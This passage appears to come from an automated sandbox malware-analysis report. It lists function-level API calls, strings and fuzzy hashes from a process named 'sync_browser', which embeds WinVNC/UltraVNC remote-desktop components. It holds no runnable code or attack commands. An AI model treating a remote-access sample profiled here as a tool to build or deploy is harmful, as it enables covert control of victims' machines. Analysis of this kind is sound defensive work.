                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorFileInfoLastSizeVersion
                                                    • String ID: Fail: Using 32bit winvnc.exe with a 64bit driver? $\StringFileInfo\000004b0\ProductVersion$\StringFileInfo\040904b0\ProductVersion
                                                    • API String ID: 752140088-134519983
                                                    • Opcode ID: e2740d92ce40838baa9be926f816465ab0ca25b8825aa07bbc0d6af3aaf476b2
                                                    • Instruction ID: e94b75f60198bf9c9d9dad1870ff6ea5622ae0c99a94c838b2b4976111e65411
                                                    • Opcode Fuzzy Hash: e2740d92ce40838baa9be926f816465ab0ca25b8825aa07bbc0d6af3aaf476b2
                                                    • Instruction Fuzzy Hash: DD219161B0965687EA14BB66A8005ADE7A0EF85FD8FC40032EE4D07A19EF7CD586C720
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ChainChangeClipboardCurrentKillThreadTimer
                                                    • String ID: vncdesktopsink.cpp : Unsethooks Failed$vncdesktopsink.cpp : Unsethooks OK$vncdesktopsink.cpp : WM_DESTROY$vncdesktopsink.cpp : unset SC hooks OK$vncdesktopsink.cpp : unset W8 hooks OK
                                                    • API String ID: 3622578367-539335655
                                                    • Opcode ID: 4ff98f2526b40473347ec64f61ad6471bc2d7702336f109aa2423c9ffd723b96
                                                    • Instruction ID: 1c14647fc6cfd0a3fb1f07d74cfac9f47eb0c9c2f039d3cd4dda2123cacdc6c5
                                                    • Opcode Fuzzy Hash: 4ff98f2526b40473347ec64f61ad6471bc2d7702336f109aa2423c9ffd723b96
                                                    • Instruction Fuzzy Hash: 2A216BA2A185D293F60CBB64E9505BDA7A1FF84B85FC84533CE1E470A0DF3CA064C220
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno$_invalid_parameter_noinfofreemalloc
                                                    • String ID:
                                                    • API String ID: 3646291181-0
                                                    • Opcode ID: 11c538c35a46a4fb5c0c73f141e54ae4a02d4c26eb65e23d1f675c1fad1344f9
                                                    • Instruction ID: 268a7f833fba09f48a5b4cfee8955fc62a2ecab476de8fdb3aaebc606471bb9d
                                                    • Opcode Fuzzy Hash: 11c538c35a46a4fb5c0c73f141e54ae4a02d4c26eb65e23d1f675c1fad1344f9
                                                    • Instruction Fuzzy Hash: 6A516D22A0E6828BEB60BB25944036DA794EB45FACFD44633EE5D177C6DF3CE4418721
                                                    APIs
                                                    • _lock.LIBCMT ref: 00007FF7D59EAD95
                                                      • Part of subcall function 00007FF7D59F77D0: _amsg_exit.LIBCMT ref: 00007FF7D59F77FA
                                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF7D59EAF59,?,?,00000000,00007FF7D59F77FF), ref: 00007FF7D59EADC8
                                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF7D59EAF59,?,?,00000000,00007FF7D59F77FF), ref: 00007FF7D59EADE6
                                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF7D59EAF59,?,?,00000000,00007FF7D59F77FF), ref: 00007FF7D59EAE26
                                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF7D59EAF59,?,?,00000000,00007FF7D59F77FF), ref: 00007FF7D59EAE40
                                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF7D59EAF59,?,?,00000000,00007FF7D59F77FF), ref: 00007FF7D59EAE50
                                                    • _initterm.LIBCMT ref: 00007FF7D59EAE90
                                                    • _initterm.LIBCMT ref: 00007FF7D59EAEA3
                                                    • ExitProcess.KERNEL32 ref: 00007FF7D59EAEDC
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: DecodePointer$_initterm$ExitProcess_amsg_exit_lock
                                                    • String ID:
                                                    • API String ID: 3873167975-0
                                                    • Opcode ID: 8948cf76fc5cf68bd72f2600188bae6337740dc35318e5811e2f59e4f5aefda3
                                                    • Instruction ID: 7ace3dcc67b7a4aa90e2fe3fa180212f7856aea6078b600711c2b091fb8ca791
                                                    • Opcode Fuzzy Hash: 8948cf76fc5cf68bd72f2600188bae6337740dc35318e5811e2f59e4f5aefda3
                                                    • Instruction Fuzzy Hash: 82418F61A1EA5283E654AB25F84453DEBA4BF88F88FC4003AED4D437A5EF3CE454C720
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseHandle$FileUnmapView$CriticalDeleteSection
                                                    • String ID:
                                                    • API String ID: 4242051881-0
                                                    • Opcode ID: 22161c178d6bb14c1052406e1d71c9eb4b4dcb4edfbb29f5cd716a860c71812c
                                                    • Instruction ID: 9f0f805ddaef43326dcb405e8cddf60198c54d4986cebf5c47ed37ac4a1eaf6f
                                                    • Opcode Fuzzy Hash: 22161c178d6bb14c1052406e1d71c9eb4b4dcb4edfbb29f5cd716a860c71812c
                                                    • Instruction Fuzzy Hash: 4511DA26A16A1A8BEB08AF79D85497CA764FF84F08FC40032CD0E53268DF3CD845C360
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalDesktopSectionThread$CloseCountCreateEnterInputLeaveOpenResumeRevertSelfTickTimetime
                                                    • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                    • API String ID: 186452611-3977938048
                                                    • Opcode ID: 240a7e3f24338c8b8522c66d0c22f1fbf1c168c0c99ca4f370a1211a49b204dc
                                                    • Instruction ID: 879cb93dd766b9892349d648551be0ea97dc167b2eb8ac6a913df743af6390e8
                                                    • Opcode Fuzzy Hash: 240a7e3f24338c8b8522c66d0c22f1fbf1c168c0c99ca4f370a1211a49b204dc
                                                    • Instruction Fuzzy Hash: A5A1B022A0869186FB94EB25C4587FEABA1EB85F88FD84033DE4C477A5CF39D455C720
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno_invalid_parameter_noinfo$AllocGlobalPathTempsprintf
                                                    • String ID: !UVNCDIR-$%s%s%s%s$.zip$\*.*
                                                    • API String ID: 3897446562-3886131270
                                                    • Opcode ID: 2256e7430c5e0a02bc82ce3aebf4d27e46064ed5cf51e837b8b2d61e65df44cc
                                                    • Instruction ID: b7b27cbaed7d4ea624f6af2142bb38041bc8b34f7ef75a5acec442bbbcefc25d
                                                    • Opcode Fuzzy Hash: 2256e7430c5e0a02bc82ce3aebf4d27e46064ed5cf51e837b8b2d61e65df44cc
                                                    • Instruction Fuzzy Hash: 65818C22608B859AEB10DB34D4003EDA761FB45BA8FD04333EA6D17AD9DF78D556C720
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Version$AddressHandleInfoModuleProcSystem
                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                    • API String ID: 335284197-192647395
                                                    • Opcode ID: bd6ae27e489f82f31fcc2b20e4ae8107fd534e528a9ba4d17229ed8c41967507
                                                    • Instruction ID: 4f7c418336ee5b43ebef4a925f373372e88602587ac5f9624eaa6b71ee11046c
                                                    • Opcode Fuzzy Hash: bd6ae27e489f82f31fcc2b20e4ae8107fd534e528a9ba4d17229ed8c41967507
                                                    • Instruction Fuzzy Hash: C6312E21A1C58287FA74A724F45577EB3A0FB89F08FC00036E98D86A89EF7CD4458B10
                                                    APIs
                                                    • GetDeviceCaps.GDI32 ref: 00007FF7D5960113
                                                    • GetDeviceCaps.GDI32 ref: 00007FF7D5960140
                                                    • GetDeviceCaps.GDI32 ref: 00007FF7D596016D
                                                      • Part of subcall function 00007FF7D593A040: OpenInputDesktop.USER32(?,?,?,00007FF7D59382D7), ref: 00007FF7D593A07A
                                                      • Part of subcall function 00007FF7D593A040: GetCurrentThreadId.KERNEL32 ref: 00007FF7D593A083
                                                      • Part of subcall function 00007FF7D593A040: GetThreadDesktop.USER32(?,?,?,00007FF7D59382D7), ref: 00007FF7D593A08B
                                                      • Part of subcall function 00007FF7D593A040: SetThreadDesktop.USER32(?,?,?,00007FF7D59382D7), ref: 00007FF7D593A0A6
                                                      • Part of subcall function 00007FF7D593A040: MessageBoxA.USER32 ref: 00007FF7D593A0B7
                                                      • Part of subcall function 00007FF7D593A040: SetThreadDesktop.USER32(?,?,?,00007FF7D59382D7), ref: 00007FF7D593A0C2
                                                      • Part of subcall function 00007FF7D593A040: CloseDesktop.USER32(?,?,?,00007FF7D59382D7), ref: 00007FF7D593A0CB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Desktop$Thread$CapsDevice$CloseCurrentInputMessageOpen
                                                    • String ID: WinVNC$vncDesktop : current display is PLANAR, not CHUNKY!WinVNC cannot be used with this graphics device driver$vncdesktop.cpp : DBG:display context has %d planes!$vncdesktop.cpp : DBG:memory context has %d planes!
                                                    • API String ID: 3271485511-23260621
                                                    • Opcode ID: aceaff558d4e77a2f2eec4c4dc82cdcf6baf6394409946313555329e23b774f0
                                                    • Instruction ID: 661ca314e27640c0085a413792ccac806ca3116647fa676d2ad9d075e50bfa54
                                                    • Opcode Fuzzy Hash: aceaff558d4e77a2f2eec4c4dc82cdcf6baf6394409946313555329e23b774f0
                                                    • Instruction Fuzzy Hash: 8E218E726181E686E704AFB5C400BE86B51EFA9F08FC80437CD8C9A699DE7C9145C331
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExecuteFileForegroundModuleNameShellVersionWindow
                                                    • String ID: -softwarecad$p$runas
                                                    • API String ID: 397093096-2208381721
                                                    • Opcode ID: fb4efa84501b81446d58e4aa4c9b0a5607d51e55c45e595c5f15ef2dbf94494a
                                                    • Instruction ID: 340ff3fca386dc545195e497fcfb24ee37476b7f1950581cb160840b79e004cf
                                                    • Opcode Fuzzy Hash: fb4efa84501b81446d58e4aa4c9b0a5607d51e55c45e595c5f15ef2dbf94494a
                                                    • Instruction Fuzzy Hash: CB11A836519B8186E764AB20F49979EB7A4FBC8B48FC00236DA8D06B58DF7CD158CB10
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExecuteFileForegroundModuleNameShellVersionWindow
                                                    • String ID: -delsoftwarecad$p$runas
                                                    • API String ID: 397093096-3343046257
                                                    • Opcode ID: 2d9c0c578c979013a183638fe42de72fccd76df398e534bf6a744ea15e2cbb9d
                                                    • Instruction ID: 311c83828b22e4b11ca67aa5d23ba2ce5c662b9a68f42e37eb9613292303e0fd
                                                    • Opcode Fuzzy Hash: 2d9c0c578c979013a183638fe42de72fccd76df398e534bf6a744ea15e2cbb9d
                                                    • Instruction Fuzzy Hash: 5511E836519B8186E764AB20F49879EB7A4FBC8B48FC00236DA8D02B58DF7CD158CB50
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _set_error_mode$CriticalSection_errno$CountExitFileInitializeLeaveModuleNameProcessSleepSpin_lockfreemalloc
                                                    • String ID:
                                                    • API String ID: 113790786-0
                                                    • Opcode ID: ab297a067351a709e4edac81291c778a22c0a59f8ebf175c2e86f69f3e49f6c1
                                                    • Instruction ID: ed9939470b6d17206e51eacdb5e3e7e21a237f351ce69544c5c055602d7cc3ce
                                                    • Opcode Fuzzy Hash: ab297a067351a709e4edac81291c778a22c0a59f8ebf175c2e86f69f3e49f6c1
                                                    • Instruction Fuzzy Hash: 41215921E2D64283F6647B60A80477EB294AF81F98FD84437ED4E466D5CF3CE8408770
                                                    APIs
                                                      • Part of subcall function 00007FF7D59F37C4: GetLastError.KERNEL32(?,?,?,00007FF7D59EFFD1,?,?,?,?,00007FF7D59E8C19,?,?,?,00007FF7D59E748C), ref: 00007FF7D59F37CE
                                                      • Part of subcall function 00007FF7D59F37C4: FlsGetValue.KERNEL32(?,?,?,00007FF7D59EFFD1,?,?,?,?,00007FF7D59E8C19,?,?,?,00007FF7D59E748C), ref: 00007FF7D59F37DC
                                                      • Part of subcall function 00007FF7D59F37C4: FlsSetValue.KERNEL32(?,?,?,00007FF7D59EFFD1,?,?,?,?,00007FF7D59E8C19,?,?,?,00007FF7D59E748C), ref: 00007FF7D59F3808
                                                      • Part of subcall function 00007FF7D59F37C4: GetCurrentThreadId.KERNEL32 ref: 00007FF7D59F381C
                                                      • Part of subcall function 00007FF7D59F37C4: SetLastError.KERNEL32(?,?,?,00007FF7D59EFFD1,?,?,?,?,00007FF7D59E8C19,?,?,?,00007FF7D59E748C), ref: 00007FF7D59F3834
                                                      • Part of subcall function 00007FF7D59F32EC: Sleep.KERNEL32(?,?,?,00007FF7D59F37F7,?,?,?,00007FF7D59EFFD1,?,?,?,?,00007FF7D59E8C19), ref: 00007FF7D59F3331
                                                    • _errno.LIBCMT ref: 00007FF7D59F9D9C
                                                    • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7D59F9DA7
                                                    Strings
                                                    Memory Dump Source
